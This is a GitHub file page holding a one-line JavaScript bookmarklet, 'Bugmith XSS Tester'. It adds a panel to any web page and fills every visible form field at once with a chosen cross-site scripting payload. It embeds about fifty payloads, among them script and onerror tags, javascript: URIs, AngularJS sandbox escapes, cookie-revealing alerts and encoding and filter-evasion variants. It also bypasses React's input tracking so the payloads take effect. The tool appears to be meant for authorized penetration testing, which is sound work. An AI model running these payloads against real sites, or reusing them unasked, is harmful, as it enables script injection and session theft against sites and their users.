-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathBugmith-XSS-Tester.js
More file actions
1 lines (1 loc) · 14.4 KB
/
Bugmith-XSS-Tester.js
File metadata and controls
1 lines (1 loc) · 14.4 KB
1
javascript:(function(){if(window.__xss_ff_open) return;window.__xss_ff_open=true;try { var d=document; function findFields(){ var fields=d.querySelectorAll('input,textarea,[contenteditable],[data-hsfc-id*="TextInput"],.hsfc-TextInput,input[name*="/"]'); var result=[]; for(var i=0;i<fields.length;i++){ var f=fields[i]; if(f && f.offsetParent!==null && !f.disabled && f.type!=='hidden'){ result.push(f); } } return result; } function makePayload(id,type){ id=String(id||'').replace(/[\"'<>]/g,''); var p=JSON.stringify('XSS-TEST-'+id); switch(type){ case 'img': return '<img src=x onerror=alert('+p+')>'; case 'alert': return '<script>alert('+p+')</script>'; case 'confirm': return '<script>confirm('+p+')</script>'; case 'svg': return '<svg onload="alert('+p+');"></svg>'; case 'script': return '<script>console.log('+p+')</script>'; case 'iframe': return '<iframe src="javascript:alert('+p+');"></iframe>'; case 'object': return '<object data="javascript:alert('+p+');"></object>'; case 'embed': return '<embed src="javascript:alert('+p+');">'; case 'form': return '<form action="javascript:alert('+p+');"><input type=submit></form>'; case 'input': return '<input onfocus="alert('+p+');" autofocus>'; case 'body': return '<body onload="alert('+p+');">'; case 'div': return '<div onmouseover="alert('+p+');">XSS</div>'; case 'a': return '<a href="javascript:alert('+p+');">click</a>'; case 'style': return '<style>body{background:url("javascript:alert('+p+')")}</style>'; case 'meta': return '<meta http-equiv="refresh" content="0;url=javascript:alert('+p+');">'; case 'link': return '<link rel="stylesheet" href="javascript:alert('+p+');"/>'; case 'base': return '<base href="javascript:alert('+p+');">'; case 'img_filter': return '<IMG SRC=#%20onmouseover="alert('+p+')">'; case 'event': return '<img%20src=x%20oNeRrOr="alert('+p+')">'; case 'javascript': return 'javascript:alert('+p+')'; case 'data': return '<img%20src="data:text/html,<script>alert('+p+')</script>">'; case 'vbscript': return '<img%20src="vbscript:msgbox('+p+')">'; case 'expression': return '<div%20style="width:expression(alert('+p+'));%20"></div>'; case 'import': return '<style>@import%20"javascript:alert('+p+');";</style>'; case 'unicode': return '<img%20src=x%20onerror="\\u0061\\u006c\\u0065\\u0072\\u0074('+p+')">'; case 'hex': return '<img%20src=x%20onerror="alert('+p+')">'; case 'url': return '<img%20src=x%20onerror="%61%6c%65%72%74('+p+')">'; case 'double': return '<img%20src=x%20onerror="%%36%%31%%36%%63%%36%%35%%37%%32%%37%%34('+p+')">'; case 'mixed': return '<ImG%20sRc=X%20oNeRrOr="ALeRt('+p+')">'; case 'null': return '<img%20src=x%20onerror="alert('+p+')"\\x00>'; case 'newline': return '<img%20src=x%20onerror="ale\\nrt('+p+')">'; case 'tab': return '<img%20src=x%20onerror="ale\\trt('+p+')">'; case 'comment': return '<img%20src=x%20onerror="alert/**/('+p+')">'; case 'cdata': return '<![CDATA[<script>alert('+p+')</script>]]>'; case 'entity': return '<img%20src=x%20onerror=" alert('+p+')">'; case 'reflected': return '<script>alert(document.domain)</script>'; case 'reflected_img': return '"><img src=x onerror=alert(document.domain)>'; case 'stored': return '<script>alert(document.domain)</script>'; case 'dom': return '"></select><img src=x onerror=alert(document.domain)>'; case 'dom_js': return 'javascript:alert(document.cookie)'; case 'angular': return '{{$on.constructor(\'alert(1)\')()}}'; case 'angular2': return '{{alert(document.domain)}}'; case 'angular3': return '{{\'a\'.constructor.prototype.charAt=[].join;$eval(\'alert(1)\')}}'; case 'template': return '${[1].map(alert)}'; case 'json': return '\\"-alert(1)}//'; case 'html_tag': return '<body onresize=print()>'; case 'html_attr': return '" autofocus onfocus=alert(document.domain) x="'; case 'string': return '\';alert(document.domain)//'; case 'dangling': return '">'; default: return '<img src=x onerror="alert('+p+')">'; } } var r=d.createElement('div'); r.id='xss-form-filler'; Object.assign(r.style,{ position:'fixed',bottom:'10px',right:'20px',width:'640px', maxHeight:'80vh',overflow:'auto',background:'#0b1220',color:'#e94560', zIndex:2147483647,padding:'16px',fontFamily:'Consolas,monospace', fontSize:'14px',border:'2px solid #e94560',borderRadius:'12px', boxShadow:'0 -8px 24px rgba(0,0,0,0.7)',cursor:'move' }); var content=d.createElement('div'); var title=d.createElement('strong'); title.textContent='Bugmith XSS Tester'; title.style.color='#e94560'; title.style.fontSize='16px'; var closeBtn=d.createElement('button'); closeBtn.textContent='X'; Object.assign(closeBtn.style,{ background:'transparent',border:'none',color:'#ff6b6b', fontSize:'18px',cursor:'pointer',float:'right' }); closeBtn.addEventListener('click',function(){ r.remove();window.__xss_ff_open=false; }); var header=d.createElement('div'); header.appendChild(title); header.appendChild(closeBtn); r.appendChild(header); var warn=d.createElement('div'); warn.textContent='WARNING: Use only on authorized targets.'; warn.style.cssText='color:#9aa5b1;font-size:13px;margin:8px 0;'; content.appendChild(warn); var lbl=d.createElement('label'); lbl.textContent='Select XSS Payload:'; lbl.style.cssText='display:block;color:#e94560;font-weight:700;margin:6px 0;font-size:14px;'; content.appendChild(lbl); var sel=d.createElement('select'); sel.style.cssText='width:100%;padding:8px;background:#16213e;color:#e94560;border:1px solid #e94560;border-radius:6px;margin-bottom:10px;font-size:13px;'; var basicGroup=d.createElement('optgroup'); basicGroup.label='Basic Tests'; var basicPayloads=[["img","IMG Onerror"],["alert","Alert Dialog"],["confirm","Confirm Dialog"],["svg","SVG Onload"],["script","Script Tag"]]; for(var i=0;i<basicPayloads.length;i++){ var opt=d.createElement('option'); opt.value=basicPayloads[i][0]; opt.textContent=basicPayloads[i][1]; basicGroup.appendChild(opt); } sel.appendChild(basicGroup); var readyGroup=d.createElement('optgroup'); readyGroup.label='Ready XSS Payloads'; var readyPayloads=[["reflected","Reflected XSS"],["reflected_img","Reflected IMG"],["stored","Stored XSS"],["dom","DOM XSS"],["dom_js","DOM JS"],["angular","AngularJS"],["angular2","Angular Alert"],["angular3","Angular Eval"],["template","Template"],["json","JSON"],["html_tag","HTML Tag"],["html_attr","HTML Attr"],["string","JS String"],["dangling","Dangling"]]; for(var i=0;i<readyPayloads.length;i++){ var opt=d.createElement('option'); opt.value=readyPayloads[i][0]; opt.textContent=readyPayloads[i][1]; readyGroup.appendChild(opt); } sel.appendChild(readyGroup); var eventGroup=d.createElement('optgroup'); eventGroup.label='Event Handlers'; var eventPayloads=[["input","Input Onfocus"],["body","Body Onload"],["div","Div Onmouseover"],["form","Form Action"]]; for(var i=0;i<eventPayloads.length;i++){ var opt=d.createElement('option'); opt.value=eventPayloads[i][0]; opt.textContent=eventPayloads[i][1]; eventGroup.appendChild(opt); } sel.appendChild(eventGroup); var protocolGroup=d.createElement('optgroup'); protocolGroup.label='Protocol Handlers'; var protocolPayloads=[["javascript","JavaScript Protocol"],["data","Data URI"],["vbscript","VBScript Protocol"]]; for(var i=0;i<protocolPayloads.length;i++){ var opt=d.createElement('option'); opt.value=protocolPayloads[i][0]; opt.textContent=protocolPayloads[i][1]; protocolGroup.appendChild(opt); } sel.appendChild(protocolGroup); var tagGroup=d.createElement('optgroup'); tagGroup.label='HTML Tags'; var tagPayloads=[["iframe","IFrame SRC"],["object","Object Data"],["embed","Embed SRC"],["a","Anchor Href"],["style","Style Expression"],["meta","Meta Refresh"],["link","Link Href"],["base","Base Href"]]; for(var i=0;i<tagPayloads.length;i++){ var opt=d.createElement('option'); opt.value=tagPayloads[i][0]; opt.textContent=tagPayloads[i][1]; tagGroup.appendChild(opt); } sel.appendChild(tagGroup); var filterGroup=d.createElement('optgroup'); filterGroup.label='Filter Evasion'; var filterPayloads=[["img_filter","IMG Filter Bypass"],["event","Event Case Mix"],["mixed","Mixed Case"],["comment","HTML Comment"],["cdata","CDATA Section"],["entity","HTML Entity"]]; for(var i=0;i<filterPayloads.length;i++){ var opt=d.createElement('option'); opt.value=filterPayloads[i][0]; opt.textContent=filterPayloads[i][1]; filterGroup.appendChild(opt); } sel.appendChild(filterGroup); var encodedGroup=d.createElement('optgroup'); encodedGroup.label='Encoded Payloads'; var encodedPayloads=[["unicode","Unicode Bypass"],["hex","Hex Encoding"],["url","URL Encoding"],["double","Double Encoding"]]; for(var i=0;i<encodedPayloads.length;i++){ var opt=d.createElement('option'); opt.value=encodedPayloads[i][0]; opt.textContent=encodedPayloads[i][1]; encodedGroup.appendChild(opt); } sel.appendChild(encodedGroup); var advancedGroup=d.createElement('optgroup'); advancedGroup.label='Advanced Techniques'; var advancedPayloads=[["null","Null Byte"],["newline","Newline Bypass"],["tab","Tab Character"],["expression","CSS Expression"],["import","CSS Import"]]; for(var i=0;i<advancedPayloads.length;i++){ var opt=d.createElement('option'); opt.value=advancedPayloads[i][0]; opt.textContent=advancedPayloads[i][1]; advancedGroup.appendChild(opt); } sel.appendChild(advancedGroup); content.appendChild(sel); var btnContainer=d.createElement('div'); btnContainer.style.cssText='display:grid;grid-template-columns:1fr 1fr 1fr;gap:10px;margin:10px 0;'; var previewBtn=d.createElement('button'); previewBtn.textContent='Preview Fields'; previewBtn.style.cssText='padding:10px;background:#16213e;color:#e94560;border:1px solid #e94560;border-radius:6px;cursor:pointer;font-weight:700;'; previewBtn.addEventListener('click',function(){ var fields=findFields(); if(!fields.length){ results.innerHTML='ERROR: No editable fields found.'; return; } var list='FOUND: '+fields.length+' fields:<br><br>'; for(var i=0;i<fields.length;i++){ var f=fields[i]; var fieldInfo={ tag:f.tagName.toLowerCase(), type:f.type||'none', name:f.name||'none', id:f.id||'none' }; list+=(i+1)+'. '+fieldInfo.tag+'['+fieldInfo.type+'] - '+fieldInfo.name+' (#'+fieldInfo.id+')<br>'; } results.innerHTML=list; }); var fillBtn=d.createElement('button'); fillBtn.textContent='Fill All'; fillBtn.style.cssText='padding:10px;background:#e94560;color:#111;border:none;border-radius:6px;cursor:pointer;font-weight:700;'; fillBtn.addEventListener('click',function(){ var fields=findFields(); var t=sel.value; if(!fields.length){ results.innerHTML='ERROR: No fields to fill.'; return; } results.innerHTML='FILLING '+fields.length+' fields...<br>'; var filled=0; for(var i=0;i<fields.length;i++){ var f=fields[i]; try{ var pid=f.name||f.id||'field_'+i; var payload=makePayload(pid,t); f.focus(); if(f.tagName==='INPUT'||f.tagName==='TEXTAREA'){ try{ var nativeInputValueSetter=Object.getOwnPropertyDescriptor(f.tagName==='INPUT'?window.HTMLInputElement.prototype:window.HTMLTextAreaElement.prototype,'value').set; nativeInputValueSetter.call(f,payload); if(f._valueTracker){ f._valueTracker.setValue(''); } }catch(reactErr){ f.value=payload; } f.dispatchEvent(new Event('input',{bubbles:true})); f.dispatchEvent(new Event('change',{bubbles:true})); }else if(f.hasAttribute&&f.hasAttribute('contenteditable')){ f.innerHTML=payload; f.dispatchEvent(new Event('input',{bubbles:true})); f.dispatchEvent(new Event('change',{bubbles:true})); } f.style.border='3px solid #4ade80'; filled++; }catch(e){ f.style.border='3px solid #ef4444'; } } results.innerHTML+='<br><br>RESULTS: '+filled+'/'+fields.length+' fields filled successfully.'; }); var clearBtn=d.createElement('button'); clearBtn.textContent='Clear All'; clearBtn.style.cssText='padding:10px;background:#444;color:#fff;border:none;border-radius:6px;cursor:pointer;font-weight:700;'; clearBtn.addEventListener('click',function(){ var fields=findFields(); var cleared=0; for(var i=0;i<fields.length;i++){ var f=fields[i]; try{ f.focus(); if(f.tagName==='INPUT'||f.tagName==='TEXTAREA'){ f.value=''; f.dispatchEvent(new Event('input',{bubbles:true})); f.dispatchEvent(new Event('change',{bubbles:true})); }else if(f.hasAttribute&&f.hasAttribute('contenteditable')){ f.innerHTML=''; f.dispatchEvent(new Event('input',{bubbles:true})); f.dispatchEvent(new Event('change',{bubbles:true})); } f.style.border=''; cleared++; }catch(e){ console.log('Clear failed for field:',f); } } results.innerHTML='CLEARED '+cleared+' fields successfully.'; }); btnContainer.appendChild(previewBtn); btnContainer.appendChild(fillBtn); btnContainer.appendChild(clearBtn); content.appendChild(btnContainer); var results=d.createElement('div'); results.style.cssText='background:#16213e;border:1px solid #444;border-radius:6px;padding:10px;margin-top:12px;max-height:260px;overflow-y:auto;font-size:12px;color:#aaa;'; results.innerHTML='Ready for enhanced XSS testing...'; content.appendChild(results); r.appendChild(content); d.body.appendChild(r); var isDragging=false,startX,startY,startLeft,startTop; r.onmousedown=function(e){ if(e.target===closeBtn||e.target===previewBtn||e.target===fillBtn||e.target===clearBtn||e.target===sel) return; isDragging=true;startX=e.clientX;startY=e.clientY; var rect=r.getBoundingClientRect();startLeft=rect.left;startTop=rect.top; e.preventDefault(); }; d.onmousemove=function(e){ if(!isDragging) return; var newLeft=startLeft+(e.clientX-startX); var newTop=startTop+(e.clientY-startY); r.style.left=Math.max(0,Math.min(window.innerWidth-r.offsetWidth,newLeft))+'px'; r.style.top=Math.max(0,Math.min(window.innerHeight-r.offsetHeight,newTop))+'px'; r.style.bottom='auto';r.style.right='auto'; }; d.onmouseup=function(){ isDragging=false; }; window.addEventListener('keydown',function(e){ if(e.key==='Escape'){ r.remove(); window.__xss_ff_open=false; } });} catch(e){ console.error(e); window.__xss_ff_open=false;}})()